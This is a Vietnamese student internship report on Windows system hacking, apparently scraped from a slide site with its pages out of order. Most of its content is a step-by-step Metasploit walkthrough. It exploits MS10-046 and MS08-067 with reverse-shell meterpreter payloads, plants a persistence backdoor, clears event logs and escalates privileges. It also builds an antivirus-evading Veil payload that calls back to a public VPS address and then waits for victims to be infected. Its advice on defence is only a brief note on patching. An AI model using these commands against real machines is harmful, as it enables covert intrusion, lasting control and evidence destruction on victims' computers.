a. (mạng LAN)
 Khởi động Kali Linux và đăng nhập thành công ,
mở terminal ta được
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
20 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Ta gõ : msfconsole và enter
Để dùng mã lỗi ms10-046:search ms10-046 và enter
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
21 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Ta gõ tiếp: use
exploit/windows/browser/ms10_046_shortcut_icon_dllload
và enter
 Dùng Lệnh show options để xem các tham số cần
thiết để có thể tiến hành tấn công được:
o SRVHOST: địa chỉ máy của kẻ tấn công, để
lắng nghe có nạn nhân nào kết nối đến hay
không
o SRVPORT: cổng lắng nghe ,mặc định là
http(80)
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
22 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
 Tiếp theo ta sẽ
o set payload windows/meterpreter/reverse_tcp
o set srvhost 192.168.181.128
o Set lhost địa chỉ ip:set lhost 192.168.181.128 .lhost
là tham số của payload mà ta vừa set ở trên
exploit để khởi động server lắng nghe trên máy tấn công
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
23 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Trên máy tính nạn nhân, tạo 1 shortcut bằng cách nhấn phải
chuột vào
Desktop -> New -> Shortcut
Ta gõ vào địa chỉ của máy tấn công vào Type the location of
the item:
http://192.168.1.35/anythingvà chọn Next
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
24 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Đặt tên cho shortcut vừa mới tạo và nhấn Finish. Ta sẽ mở
shortcut này:
Đợi một lát, trên máy tính tấn công ta được:
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
25 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Dùng lệnh sessions để xem các phiên làm việc mà Metasploit
đang có:
Để tương tác với 1 session nào đó ta thực hiện: sessions –i 1 (1
là id của sessions)
Và bây giờ thì mọi việc đã trở nên dễ dàng hơn, khi kẻ tấn
công đã điều khiển
được máy nạn nhân với toàn quyền. Ví dụ:
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
26 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Lệnh sysinfo để lấy thông tin của máy nạn nhân:
Lệnh rất hữu ích để sử dụng cmd (command-line): shell
Lấy ip victim qua cmd(dùng ipconfig) :
Xem các chương trình chạy trên máy victim (dùng tasklist):
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
27 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Thoát cmd (dùng lệnh “exit”):
sau khi hoàn thành bước xâm nhập vào máy nạn nhận, các
hacker thường tiến hành bước tiếp theo là cần duy trì để sau này
có thể truy cập lại dễ dàng mà không cần thực hiện nhiều công
đoạn. Việc duy trì kết nối thông thường bằng cách bỏ backdoor
vào máy victim
Cài Backdoor trên máy victim(câu lệnh:”run persistence” –h
để xem help):
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
28 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Dựa vào trên ta dùng câu lệnh như sau:
Xong , ta đã cài backdoor vào máy victim. Cho dù victim tắt máy
, khi log on lên màn hình metasploit sẽ connect lại.
Đễ xem backdoor của mình trên máy victim ta thấy pid của
backdoor là 704 (hình trên)
Ta dùng “shell” , “ tasklist” để xem .
Xóa dấu vết sau khi tấn công: (dùng lệnh “clearev”)
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
29 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Mã lỗi ms08_067
Khởi động metasploit và search mã lỗi ms08_067
Dùng lệnh show option để xem yêu cầu
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
30 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Set các giá trị
RHOST : IP victim
RPORT : mặc định
PAYLOAD : thư viện sử dụng
LHOST : IP máy attack
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
31 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Dùng lệnh exploit để tiến hành tấn công
Quá trình tấn công hoàn tất , bây giờ có thể điều khiển được
máy victim
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
32 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Dùng lệnh screenshot để chup màn hinh victim … và còn
nhiều chức năng khác .
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
33 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
b. Triễn Khai trên vps
Mã hóa bằng Veil
cd Veil-Evasion
./Veil-Evasion.py
list
use python/meterpreter/rev_tcp
set LHOST 162.250.123.132
set compile_to exe Y
generate
*filename*
ở đây mình dùng vps linux Ubuntu server
download putty.exe và đăng nhập
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
34 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
download và tải metasploit + Veil
gõ msfconsole và sữ dụng lệnh : use exploit/multi/hander
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
35 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
tiếp theo ta sẽ:
set payload windows/meterpreter/reverse_tcp
show options
set lhost <dia chi ip vps> - set lhost 162.250.123.132
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
36 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
ta được giao diện như sau :
xong ta gõ exploit và đợi victim nhiễm như bên vps .
nâng quyền ta dùng getsystem – lưu ý chỉ sữ dụng khi user hiện tại là administraitor
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
37 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
III. Cách phòng chống
Thường xuyên cập nhật các bản vá lỗi của Windows để trách bị
hacker lợi dụng.
Bản vá lỗi có tên mã là KB2286198 chứa đựng phiên bản mới
của tập tin Shell32.dll, đây là phần cập nhật quan trọng.
Shell32.dll là một tập tin thư viện rất quan trọng trong Windows,
nó chứa đựng một số hàm Windows Shell API. Nếu Shell32.dll bị
lỗi hay cập nhật lỗi, máy tính sẽ có tình trạng "Màn hình xanh
chết chóc" hay Blue Screen.
Tài Liệu Tham Khảo
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics
https://www.google.com.vn/
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
38 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
TÀI LIỆU THAM KHẢO
[1]. Trang Web: hackforums.net
[2]. Trang Web: ubers.org
[3]. Trang web : forum.whitehat.vn
[4] Tài Liệu Học Tập Athena – Bộ CD System Hacking
[5] Kali CookBook

More Related Content

What's hot (20)

PDF
Tổng quan điện toán đám mây
PhamTuanKhiem
 
DOCX
System Hacking
Trí Huỳnh
 
PDF
IDS Snort/SnortSam
Tiki.vn
 
PPTX
Slide An toàn mạng nâng cao PTIT
NguynMinh294
 
PDF
TÌM HIỂU FIREWALL VÀ TRIỂN KHAI TRÊN MÃ NGUỒN MỞ
Tiki.vn
 
DOCX
200 đề tài luận văn thạc sĩ an ninh mạng. HAY
Dịch vụ viết thuê Khóa Luận - ZALO 0932091562
 
DOCX
Tổng quan về định tuyến tĩnh và
shinibi
 
DOC
Bai tap chia_dia_chi_ip
Nguyễn Chí Hiền
 
PPTX
Các kỹ thuật CrackPassword bằng John the Ripper.pptx
MinhDouble1
 
PDF
Chương 8_Bảo mật và an ninh mạng
Hoa Le
 
DOCX
Cấu hình căn bản trên GNS3
hoangtuvit123
 
PDF
Phân tích mã độc cơ bản - báo cáo thực tập
Phạm Trung Đức
 
PDF
Luận văn: Bài toán an toàn thông tin cho doanh nghiệp vừa và nhỏ
Dịch vụ viết bài trọn gói ZALO 0917193864
 
PDF
Báo cáo đồ án tôt nghiệp: Xây dựng Website bán hàng thông minh
nataliej4
 
DOCX
TÌM HIỂU VÀ TRIỂN KHAI TRUNG TÂM GIÁM SÁT AN TOÀN MẠNG TRÊN NỀN TẢNG WAZUH.docx
DV Viết Luận văn luanvanmaster.com ZALO 0973287149
 
PDF
Bài gảng cơ sở an toàn thông tin PTIT
NguynMinh294
 
PPTX
Mã xác thực thông điệp-edited.pptx
ssuserbc08fb
 
PDF
Báo cáo System hacking
Huynh Khang
 
PDF
Cơ sở an toàn thông tin chương 2
NguynMinh294
 
DOCX
Đồ án kiểm thử phần mềm
Nguyễn Anh
 
Tổng quan điện toán đám mây
PhamTuanKhiem
 
System Hacking
Trí Huỳnh
 
IDS Snort/SnortSam
Tiki.vn
 
Slide An toàn mạng nâng cao PTIT
NguynMinh294
 
TÌM HIỂU FIREWALL VÀ TRIỂN KHAI TRÊN MÃ NGUỒN MỞ
Tiki.vn
 
200 đề tài luận văn thạc sĩ an ninh mạng. HAY
Dịch vụ viết thuê Khóa Luận - ZALO 0932091562
 
Tổng quan về định tuyến tĩnh và
shinibi
 
Bai tap chia_dia_chi_ip
Nguyễn Chí Hiền
 
Các kỹ thuật CrackPassword bằng John the Ripper.pptx
MinhDouble1
 
Chương 8_Bảo mật và an ninh mạng
Hoa Le
 
Cấu hình căn bản trên GNS3
hoangtuvit123
 
Phân tích mã độc cơ bản - báo cáo thực tập
Phạm Trung Đức
 
Luận văn: Bài toán an toàn thông tin cho doanh nghiệp vừa và nhỏ
Dịch vụ viết bài trọn gói ZALO 0917193864
 
Báo cáo đồ án tôt nghiệp: Xây dựng Website bán hàng thông minh
nataliej4
 
TÌM HIỂU VÀ TRIỂN KHAI TRUNG TÂM GIÁM SÁT AN TOÀN MẠNG TRÊN NỀN TẢNG WAZUH.docx
DV Viết Luận văn luanvanmaster.com ZALO 0973287149
 
Bài gảng cơ sở an toàn thông tin PTIT
NguynMinh294
 
Mã xác thực thông điệp-edited.pptx
ssuserbc08fb
 
Báo cáo System hacking
Huynh Khang
 
Cơ sở an toàn thông tin chương 2
NguynMinh294
 
Đồ án kiểm thử phần mềm
Nguyễn Anh
 

Viewers also liked (20)

DOC
Shawn Lee www.teresashawncorp.com
teresa&shawn int'l corp
 
PDF
D033019025
inventionjournals
 
PPTX
Editing technique for mr rosen
ameliajanew
 
PPTX
Working title case study
CPugh2005
 
PPT
Web Filters And Other Evil Doers
cathtech
 
PPTX
The importance of data
dhenderson2005
 
PPTX
Unit 3 Membaca Dan Menulis Jawi
cabotgigisakit
 
PPT
Run on repair
Lauradw99
 
PDF
The Power of Your Story
Peter de Kuster
 
PPTX
Viagem de uma castanha
Sandra Figueiredo
 
PPTX
Working Title
Annetteyhh
 
PDF
Garantie avantage- Pamphlet explicatif
Silvia Breahna
 
PPTX
Task 5 - Research into an Artist
LeahRiley
 
PPTX
Different layouts for Front Cover
chloef123
 
PDF
Cho thuê biệt thự sân golf Sealinks, giá 2 tr/ 2 ngày 1 đêm, 0989171123
luongquocbao
 
DOCX
Planning calendar
alice12345
 
PDF
“Nivel de conocimiento de la depresión en los adolescentes en ciclo diversifi...
Tesisdenosotros
 
DOCX
Blank Questionnaire Design
Holly182
 
PPTX
Initial planning ideas
LeahRiley
 
PPS
Redes Informaticas
tania97
 
Shawn Lee www.teresashawncorp.com
teresa&shawn int'l corp
 
D033019025
inventionjournals
 
Editing technique for mr rosen
ameliajanew
 
Working title case study
CPugh2005
 
Web Filters And Other Evil Doers
cathtech
 
The importance of data
dhenderson2005
 
Unit 3 Membaca Dan Menulis Jawi
cabotgigisakit
 
Run on repair
Lauradw99
 
The Power of Your Story
Peter de Kuster
 
Viagem de uma castanha
Sandra Figueiredo
 
Working Title
Annetteyhh
 
Garantie avantage- Pamphlet explicatif
Silvia Breahna
 
Task 5 - Research into an Artist
LeahRiley
 
Different layouts for Front Cover
chloef123
 
Cho thuê biệt thự sân golf Sealinks, giá 2 tr/ 2 ngày 1 đêm, 0989171123
luongquocbao
 
Planning calendar
alice12345
 
“Nivel de conocimiento de la depresión en los adolescentes en ciclo diversifi...
Tesisdenosotros
 
Blank Questionnaire Design
Holly182
 
Initial planning ideas
LeahRiley
 
Redes Informaticas
tania97
 
Ad

Similar to Metasploit 24-03-2014 (20)

DOCX
Pham_hong_quang
renlue
 
DOCX
Doan_duy_khiem
renlue
 
DOCX
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Quý Đồng Nast
 
DOCX
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Quý Đồng Nast
 
DOCX
Tuan vq bao cao thuc tap_ system hacking
v7q3t
 
PDF
Tai lieu huong_dan_su_dung_backtrack_5_2524
Ngô Đăng Tân
 
DOCX
Bao caothuctap
Long Prồ
 
DOCX
Vu tuananh
Vũ Anh
 
DOCX
SYSTEM HACKING - TUẦN 2
Con Ranh
 
DOCX
SYSTEM HACKING - TUẦN 1
Con Ranh
 
DOCX
Vu tuananh
Vũ Anh
 
DOCX
Báo cáo lần 1
Anhh Hữu
 
DOCX
Báo cáo tổng kết thực tập athena
Quý Đồng Nast
 
DOCX
Bao cao thuc tap nguyen hoai huy
hoaihuysc
 
DOCX
Bao cao thuc tap athena tuan 1 2-3
HoangHai930705
 
PDF
Security Bootcamp 2013 penetration testing (basic)
Security Bootcamp
 
PDF
Báo cáo cuối kỳ Athena - Report
Phạm Minh Đạt
 
DOCX
Bao cao thuc tap tuan 2
Âu Dương Bình
 
PDF
Bao cao thuc tap athena
Âu Dương Bình
 
DOCX
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Con Ranh
 
Pham_hong_quang
renlue
 
Doan_duy_khiem
renlue
 
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Quý Đồng Nast
 
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Quý Đồng Nast
 
Tuan vq bao cao thuc tap_ system hacking
v7q3t
 
Tai lieu huong_dan_su_dung_backtrack_5_2524
Ngô Đăng Tân
 
Bao caothuctap
Long Prồ
 
Vu tuananh
Vũ Anh
 
SYSTEM HACKING - TUẦN 2
Con Ranh
 
SYSTEM HACKING - TUẦN 1
Con Ranh
 
Vu tuananh
Vũ Anh
 
Báo cáo lần 1
Anhh Hữu
 
Báo cáo tổng kết thực tập athena
Quý Đồng Nast
 
Bao cao thuc tap nguyen hoai huy
hoaihuysc
 
Bao cao thuc tap athena tuan 1 2-3
HoangHai930705
 
Security Bootcamp 2013 penetration testing (basic)
Security Bootcamp
 
Báo cáo cuối kỳ Athena - Report
Phạm Minh Đạt
 
Bao cao thuc tap tuan 2
Âu Dương Bình
 
Bao cao thuc tap athena
Âu Dương Bình
 
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Con Ranh
 
Ad

Recently uploaded (20)

PDF
Bộ câu hỏi ôn tập môn Địa lí kỳ thi ĐGNL
vinhhoangquang2006
 
PDF
GIÁO ÁN KẾ HOẠCH BÀI DẠY CÔNG NGHỆ ĐIỆN TỬ 12 - KẾT NỐI TRI THỨC THEO CÔNG VĂ...
Nguyen Thanh Tu Collection
 
PPTX
giaobanTN 3103 nhanh lên còn làm ciệv.pptx
cuocsongdaophatva
 
PDF
BÀI TẬP TEST FOR UNIT TIẾNG ANH LỚP 9 GLOBAL SUCCESS CẢ NĂM THEO TỪNG ĐƠN VỊ ...
Nguyen Thanh Tu Collection
 
PPTX
đẻ cấp cứu vãi cả trưởng lằng nhằng .pptx
cuocsongdaophatva
 
PPTX
Buổi 2 - Thiết kế giao diện người dùng - Đại học Công nghệ Thông tin
ngoanhtun3010
 
PPTX
TNHN 10 Chủ đề 1. Hoạt động 2+3 (1).pptx
luucuong15398
 
PDF
BÀI TẬP BỔ TRỢ TIẾNG ANH LỚP 5 - I-LEARN SMART START - HK1 - NĂM 2024 (BẢN H...
Nguyen Thanh Tu Collection
 
PDF
BÀI TẬP DẠY THÊM CẢ NĂM TOÁN 8 CÓ ĐỀ ÔN TẬP KẾT THÚC CHƯƠNG - PHIÊN BẢN 2026 ...
Nguyen Thanh Tu Collection
 
PDF
Sáng kiến Một số biện pháp khai thác phần mềm MozaBook trong dạy học hình học...
Nguyen Thanh Tu Collection
 
PPTX
Chapert7 8.1. Édsdsdsddsdsdsstimation.pptx
b23h0042
 
PDF
1.2. VBHN Luat-Can-bo-cong-chuc moi nhat.pdf
QucHuy628268
 
PPTX
BÁO CÁO LVCK1 - DoPhucHau 2022 (graduated) .pptx
HaiNguyen04
 
DOC
Bài 12-II.doc...............................
FreePlayer1
 
DOCX
Đề cương quản trị dữ liệu - đề cương học phần
kimphuong48khql
 
PDF
tong-hop-ngu-phap-tieng anh 6 file pdf pdf
annhudo105
 
PDF
BÀI GIẢNG ĐIỆN TỬ POWERPOINT THEO LESSON TIẾNG ANH 9 - HK1 - NĂM 2026 - GLOBA...
Nguyen Thanh Tu Collection
 
PDF
BÀI TẬP TEST FOR UNIT TIẾNG ANH LỚP 7 GLOBAL SUCCESS CẢ NĂM THEO TỪNG ĐƠN VỊ ...
Nguyen Thanh Tu Collection
 
PPTX
Đạo đức va Cuoc song bENH VIEN khhdhsa.pptx
247720101022
 
PPTX
Lưu trữ dữ liệu và khai thác thông tin phục vụ quản lí
khiem1809071
 
Bộ câu hỏi ôn tập môn Địa lí kỳ thi ĐGNL
vinhhoangquang2006
 
GIÁO ÁN KẾ HOẠCH BÀI DẠY CÔNG NGHỆ ĐIỆN TỬ 12 - KẾT NỐI TRI THỨC THEO CÔNG VĂ...
Nguyen Thanh Tu Collection
 
giaobanTN 3103 nhanh lên còn làm ciệv.pptx
cuocsongdaophatva
 
BÀI TẬP TEST FOR UNIT TIẾNG ANH LỚP 9 GLOBAL SUCCESS CẢ NĂM THEO TỪNG ĐƠN VỊ ...
Nguyen Thanh Tu Collection
 
đẻ cấp cứu vãi cả trưởng lằng nhằng .pptx
cuocsongdaophatva
 
Buổi 2 - Thiết kế giao diện người dùng - Đại học Công nghệ Thông tin
ngoanhtun3010
 
TNHN 10 Chủ đề 1. Hoạt động 2+3 (1).pptx
luucuong15398
 
BÀI TẬP BỔ TRỢ TIẾNG ANH LỚP 5 - I-LEARN SMART START - HK1 - NĂM 2024 (BẢN H...
Nguyen Thanh Tu Collection
 
BÀI TẬP DẠY THÊM CẢ NĂM TOÁN 8 CÓ ĐỀ ÔN TẬP KẾT THÚC CHƯƠNG - PHIÊN BẢN 2026 ...
Nguyen Thanh Tu Collection
 
Sáng kiến Một số biện pháp khai thác phần mềm MozaBook trong dạy học hình học...
Nguyen Thanh Tu Collection
 
Chapert7 8.1. Édsdsdsddsdsdsstimation.pptx
b23h0042
 
1.2. VBHN Luat-Can-bo-cong-chuc moi nhat.pdf
QucHuy628268
 
BÁO CÁO LVCK1 - DoPhucHau 2022 (graduated) .pptx
HaiNguyen04
 
Bài 12-II.doc...............................
FreePlayer1
 
Đề cương quản trị dữ liệu - đề cương học phần
kimphuong48khql
 
tong-hop-ngu-phap-tieng anh 6 file pdf pdf
annhudo105
 
BÀI GIẢNG ĐIỆN TỬ POWERPOINT THEO LESSON TIẾNG ANH 9 - HK1 - NĂM 2026 - GLOBA...
Nguyen Thanh Tu Collection
 
BÀI TẬP TEST FOR UNIT TIẾNG ANH LỚP 7 GLOBAL SUCCESS CẢ NĂM THEO TỪNG ĐƠN VỊ ...
Nguyen Thanh Tu Collection
 
Đạo đức va Cuoc song bENH VIEN khhdhsa.pptx
247720101022
 
Lưu trữ dữ liệu và khai thác thông tin phục vụ quản lí
khiem1809071
 

Metasploit 24-03-2014

  • 1. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 1 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Contents NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ................................................3 NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ................................................4 CHƯƠNG I. GIỚI THIỆU VỀ BACKTRACK 5.............................................5 I. Giới thiệu............................................................................................................................................5 II. Mục đích............................................................................................................................................5 CHƯƠNG 2. TÌNH HÌNH BẢO MẬT MẠNG LAN HIỆN NAY ..................7 I. Giới thiệu .....................................................................................................................................7 II. Vấn đề bảo mật hệ thống và mạng..............................................................................................7 CHƯƠNG 3. Tấn Công Hệ Thống –System Hacking ....................................12 I. Giới Thiệu Về Metasploit........................................................................12 1. Giới Thiệu..................................................................................................................................12 2. Các Thành Phần Của Metasploit................................................................................................13 3. Sử dụng Metasploit Framework.................................................................................................14 a) Chọn module exploit.............................................................................................................. 14 b) Cấu hình module exploit đã chọn........................................................................................... 14 c) Verify những options vừa cấu hình........................................................................................ 14 d) Lựa chọn target ...................................................................................................................... 14 e) Lựa chọn payload................................................................................................................... 15 f) Thực thi exploit...................................................................................................................... 15 4. Giới thiệu Payload Meterpreter .................................................................................................16 a) Sử dụng module Fs................................................................................................................. 16 b) Sử dụng module Net............................................................................................................... 17 c) Sử dụng module Process........................................................................................................ 17 d) Sử dụng module Sys............................................................................................................... 17
  • 2. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 2 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP 5. Cách phòng chống .....................................................................................................................17 II. Lỗi MS10-046 (2286198)..........................................................................18 1. Giới thiệu ...................................................................................................................................18 2. Các bước tấn công......................................................................................................................19 a. (mạng LAN)............................................................................................................................. 19 b. Triễn Khai trên vps................................................................................................................. 33 III. Cách phòng chống....................................................................................37 Tài Liệu Tham Khảo..........................................................................................37
  • 3. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 3 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ……………………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… .…………………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ….………………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… …….……………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……….…………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ………….………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… …………….……………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……………….…………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ………………….………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… …………………….……………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……………………….…………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ………………………….………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……………………………. NGÀY… THÁNG… NĂM
  • 4. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 4 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ……………………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… .…………………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ….………………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… …….……………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……….…………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ………….………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… …………….……………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……………….…………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ………………….………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… …………………….……………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……………………….…………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ………………………….………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……………………………. NGÀY… THÁNG… NĂM
  • 5. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 5 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP CHƯƠNG I. GIỚI THIỆU VỀ BACKTRACK 5 I. Giới thiệu Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập.Trong các định dạng Live DVD, chúng ta sử dụng có thể Backtrack trực tiếp từ đĩa DVD mà không cần cài nó vào máy của chúng ta. Backtrack cũng có thể được cài đặt vào ổ cứng và sử dụng như một hệ điều hành. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm - IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 11.10. Tính đến ngày 19 tháng bảy năm 2010, Backtrack 5 đã được tải về của hơn 1,5 triệu người sử dụng. Phiên bản mới nhất là Backtrack 5 R2 II. Mục đích Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác nhau. Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M. (www.slax.org)). Backtrack liên tục cập nhật các công cụ, drivers,... hiện tại Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là sự kết hợp giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và Auditor. Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5,0 có thể được phân loại như sau:  Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ mail, và như vậy. Thông tin này được thu thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu.
  • 6. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 6 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP  Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning.  Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).  Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web  Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này.  Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu  Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất.  Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì quyền truy cập  Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ trong thể loại này  Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn. Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi.
